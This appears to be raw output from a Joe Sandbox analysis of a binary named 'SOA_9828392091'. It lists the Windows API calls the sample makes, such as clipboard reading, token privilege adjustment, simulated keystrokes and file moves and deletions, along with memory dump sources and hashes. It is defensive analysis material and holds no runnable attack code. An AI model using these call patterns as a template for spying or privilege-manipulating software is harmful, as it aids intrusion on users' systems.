                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • __lock_file.LIBCMT ref: 00952AED
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,009339FE,?,00000001), ref: 00934286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009340C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                      • Instruction ID: 97b51dd3216416c3ba8595d37dd92cd86bbf88aca3089235f04b05e528202ae4
                                      • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                      • Instruction Fuzzy Hash: 92E092B1204B009BD7388A24D800BE373E4EB05305F00481CF69A83241EB627841C759
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 018B9739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 3ad9369ada3cbbf37556422015bd42b3670b58866997a084c2658f5e62e0e129
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 33E0E67494010DDFDB00DFB4D5496DD7BF4EF04301F100161FD01D2280D6309E509A62
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0099F87D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099F8DC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0099F919
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099F940
                                      • SendMessageW.USER32 ref: 0099F966
                                      • _wcsncpy.LIBCMT ref: 0099F9D2
                                      • GetKeyState.USER32(00000011), ref: 0099F9F3
                                      • GetKeyState.USER32(00000009), ref: 0099FA00
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099FA16
                                      • GetKeyState.USER32(00000010), ref: 0099FA20
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099FA4F
                                      • SendMessageW.USER32 ref: 0099FA72
                                      • SendMessageW.USER32(?,00001030,?,0099E059), ref: 0099FB6F
                                      • SetCapture.USER32(?), ref: 0099FB9F
                                      • ClientToScreen.USER32(?,?), ref: 0099FC03
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0099FC29
                                      • ReleaseCapture.USER32 ref: 0099FC34
                                      • GetCursorPos.USER32(?), ref: 0099FC69
                                      • ScreenToClient.USER32(?,?), ref: 0099FC76
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0099FCD8
                                      • SendMessageW.USER32 ref: 0099FD02
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0099FD41
                                      • SendMessageW.USER32 ref: 0099FD6C
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0099FD84
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0099FD8F
                                      • GetCursorPos.USER32(?), ref: 0099FDB0
                                      • ScreenToClient.USER32(?,?), ref: 0099FDBD
                                      • GetParent.USER32(?), ref: 0099FDD9
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0099FE3F
                                      • SendMessageW.USER32 ref: 0099FE6F
                                      • ClientToScreen.USER32(?,?), ref: 0099FEC5
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0099FEF1
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0099FF19
                                      • SendMessageW.USER32 ref: 0099FF3C
                                      • ClientToScreen.USER32(?,?), ref: 0099FF86
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0099FFB6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 009A004B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3461372671-4164748364
                                      • Opcode ID: c4bc0f7934581d4afc7175783c20db62a10f3203ab2efb646d64c9b04cca5248
                                      • Instruction ID: fdeb42540a22e0f2285f53c2b85c092eee7b9ca405355c5c265c25a5bf3b0c68
                                      • Opcode Fuzzy Hash: c4bc0f7934581d4afc7175783c20db62a10f3203ab2efb646d64c9b04cca5248
                                      • Instruction Fuzzy Hash: 4032CD70608345EFDB20CF68C894BAABBA8FF49354F140A29F696C72A1D771DC44DB51
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0099B1CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: 10c305c62d6c52ae6143bab8cd4edeb1d7669067e302ce3399d32c188842044e
                                      • Instruction ID: 66e84816f23262fce3577929ecda68bb2275bd881f4e42cfc7a57798d0943d4f
                                      • Opcode Fuzzy Hash: 10c305c62d6c52ae6143bab8cd4edeb1d7669067e302ce3399d32c188842044e
                                      • Instruction Fuzzy Hash: 6312CF71604209ABEF248F68DD59FAE7BB8FF85320F104629F915DB2D0EB788941CB51
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0094EB4A
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009A3AEA
                                      • IsIconic.USER32(000000FF), ref: 009A3AF3
                                      • ShowWindow.USER32(000000FF,00000009), ref: 009A3B00
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3B0A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009A3B20
                                      • GetCurrentThreadId.KERNEL32 ref: 009A3B27
                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009A3B33
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009A3B44
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009A3B4C
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 009A3B54
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3B57
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B6C
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B77
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B81
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B86
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B8F
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B94
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B9E
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3BA3
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3BA6
                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009A3BCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: 33446e60ec7232894d768c61af42923a55ccde4cd143391bd01c9b36a10dc804
                                      • Instruction ID: acbca34896fe0f72f09e8b9ee1aeb2cc2ab04f50588af87f37caffabf902bfa0
                                      • Opcode Fuzzy Hash: 33446e60ec7232894d768c61af42923a55ccde4cd143391bd01c9b36a10dc804
                                      • Instruction Fuzzy Hash: 4F31A671A54318BBEB305B759D49F7F7E6CEB44B60F108125FA05EA1D0EAB05D00AEB0
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00975FA6,?), ref: 00976EF1
                                        • Part of subcall function 0097725E: __wsplitpath.LIBCMT ref: 0097727B
                                        • Part of subcall function 0097725E: __wsplitpath.LIBCMT ref: 0097728E
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • _wcscat.LIBCMT ref: 00976149
                                      • _wcscat.LIBCMT ref: 00976167
                                      • __wsplitpath.LIBCMT ref: 0097618E
                                      • FindFirstFileW.KERNEL32(?,?), ref: 009761A4
                                      • _wcscpy.LIBCMT ref: 00976209
                                      • _wcscat.LIBCMT ref: 0097621C
                                      • _wcscat.LIBCMT ref: 0097622F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0097625D
                                      • DeleteFileW.KERNEL32(?), ref: 0097626E
                                      • MoveFileW.KERNEL32(?,?), ref: 00976289
                                      • MoveFileW.KERNEL32(?,?), ref: 00976298
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 009762AD
                                      • DeleteFileW.KERNEL32(?), ref: 009762BE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009762E1
                                      • FindClose.KERNEL32(00000000), ref: 009762FD
                                      • FindClose.KERNEL32(00000000), ref: 0097630B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                      • String ID: \*.*$p1#v`K$v
                                      • API String ID: 1917200108-1732502266
                                      • Opcode ID: 1266841762c444b04786acd6af61ad2582b91d95cbc495faf056ae187c2c8ff9
                                      • Instruction ID: c72d304206f3bd06e1695cb22cd837cdb7223e34fba2beb9874eb86ea383fd16
                                      • Opcode Fuzzy Hash: 1266841762c444b04786acd6af61ad2582b91d95cbc495faf056ae187c2c8ff9
                                      • Instruction Fuzzy Hash: 18514F7280911C6ACB21EB91CC44EEF77BCAF45310F0545E6E599E2142EB3697498FA4
                                      APIs
                                      • OpenClipboard.USER32(009CDC00), ref: 00986B36
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00986B44
                                      • GetClipboardData.USER32(0000000D), ref: 00986B4C
                                      • CloseClipboard.USER32 ref: 00986B58
                                      • GlobalLock.KERNEL32(00000000), ref: 00986B74
                                      • CloseClipboard.USER32 ref: 00986B7E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00986B93
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00986BA0
                                      • GetClipboardData.USER32(00000001), ref: 00986BA8
                                      • GlobalLock.KERNEL32(00000000), ref: 00986BB5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00986BE9
                                      • CloseClipboard.USER32 ref: 00986CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: 349aabc8f795c044e394f9645ea5c35a53fd220d242a5b97fad6869532a1acbc
                                      • Instruction ID: 93951063f7742b76d82e79db33b05357430ccb35b2e9d150efa734d1bdf233ce
                                      • Opcode Fuzzy Hash: 349aabc8f795c044e394f9645ea5c35a53fd220d242a5b97fad6869532a1acbc
                                      • Instruction Fuzzy Hash: CA51A271209201ABD300FF64DE56F6E77A8EF88B10F004529F696DA2E1EF70D905DB62
                                      APIs
                                        • Part of subcall function 0096B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                        • Part of subcall function 0096B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                        • Part of subcall function 0096B134: GetLastError.KERNEL32 ref: 0096B1BA
                                      • _memset.LIBCMT ref: 0096AD08
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0096AD5A
                                      • CloseHandle.KERNEL32(?), ref: 0096AD6B
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0096AD82
                                      • GetProcessWindowStation.USER32 ref: 0096AD9B
                                      • SetProcessWindowStation.USER32(00000000), ref: 0096ADA5
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0096ADBF
                                        • Part of subcall function 0096AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0096ACC0), ref: 0096AB99
                                        • Part of subcall function 0096AB84: CloseHandle.KERNEL32(?,?,0096ACC0), ref: 0096ABAB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: dd107c03e80271a69483c50ac197428642386d097a674829ceaa6527b39a7d73
                                      • Instruction ID: 12dc2c20edd671e3e89c8bb25bf5655938c29a16f4cbdbb3f190ddfb4681b7f7
                                      • Opcode Fuzzy Hash: dd107c03e80271a69483c50ac197428642386d097a674829ceaa6527b39a7d73
                                      • Instruction Fuzzy Hash: 51816E71801209AFDF129FA4DD49AEE7BBCEF08314F048119F914B61A1E7368E55DF62
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097F62B
                                      • FindClose.KERNEL32(00000000), ref: 0097F67F
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097F6A4
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097F6BB
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0097F6E2
                                      • __swprintf.LIBCMT ref: 0097F72E
                                      • __swprintf.LIBCMT ref: 0097F767
                                      • __swprintf.LIBCMT ref: 0097F7BB
                                        • Part of subcall function 0095172B: __woutput_l.LIBCMT ref: 00951784
                                      • __swprintf.LIBCMT ref: 0097F809
                                      • __swprintf.LIBCMT ref: 0097F858
                                      • __swprintf.LIBCMT ref: 0097F8A7
                                      • __swprintf.LIBCMT ref: 0097F8F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 835046349-2428617273
                                      • Opcode ID: 96ae6e1780c3f0b2838b4a204bfb855a2894588f43326427ca8f2ff3eee79427
                                      • Instruction ID: 4d719333902527c3c3bdc8ffb1bcec6bdf7a64ae8afbf4ca33741d7df919f3fb
                                      • Opcode Fuzzy Hash: 96ae6e1780c3f0b2838b4a204bfb855a2894588f43326427ca8f2ff3eee79427
                                      • Instruction Fuzzy Hash: AAA12FB2408344ABC314EBA5C895EAFB7ECBFD8704F40492EF59593191EB34D949CB62
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00981B50
                                      • _wcscmp.LIBCMT ref: 00981B65
                                      • _wcscmp.LIBCMT ref: 00981B7C
                                      • GetFileAttributesW.KERNEL32(?), ref: 00981B8E
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00981BA8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00981BC0
                                      • FindClose.KERNEL32(00000000), ref: 00981BCB
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00981BE7
                                      • _wcscmp.LIBCMT ref: 00981C0E
                                      • _wcscmp.LIBCMT ref: 00981C25
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00981C37
                                      • SetCurrentDirectoryW.KERNEL32(009E39FC), ref: 00981C55
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00981C5F
                                      • FindClose.KERNEL32(00000000), ref: 00981C6C
                                      • FindClose.KERNEL32(00000000), ref: 00981C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 1f9eb40be3488a1ddc7a96a83329d950c1795653c39ff30920cb8c5bc71579d0
                                      • Instruction ID: 79346d9864a12873f5973704c3879c3fa14f6ec076473fa292c075316ed4d1b4
                                      • Opcode Fuzzy Hash: 1f9eb40be3488a1ddc7a96a83329d950c1795653c39ff30920cb8c5bc71579d0
                                      • Instruction Fuzzy Hash: 0A31F33250521AABCF14EFA5DC48BEE77ACAF45324F0042A5F911E3190EB70DE868B64
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • DragQueryPoint.SHELL32(?,?), ref: 0099F37A
                                        • Part of subcall function 0099D7DE: ClientToScreen.USER32(?,?), ref: 0099D807
                                        • Part of subcall function 0099D7DE: GetWindowRect.USER32(?,?), ref: 0099D87D
                                        • Part of subcall function 0099D7DE: PtInRect.USER32(?,?,0099ED5A), ref: 0099D88D
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099F3E3
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0099F3EE
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0099F411
                                      • _wcscat.LIBCMT ref: 0099F441
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0099F458
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099F471
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0099F488
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0099F4AA
                                      • DragFinish.SHELL32(?), ref: 0099F4B1
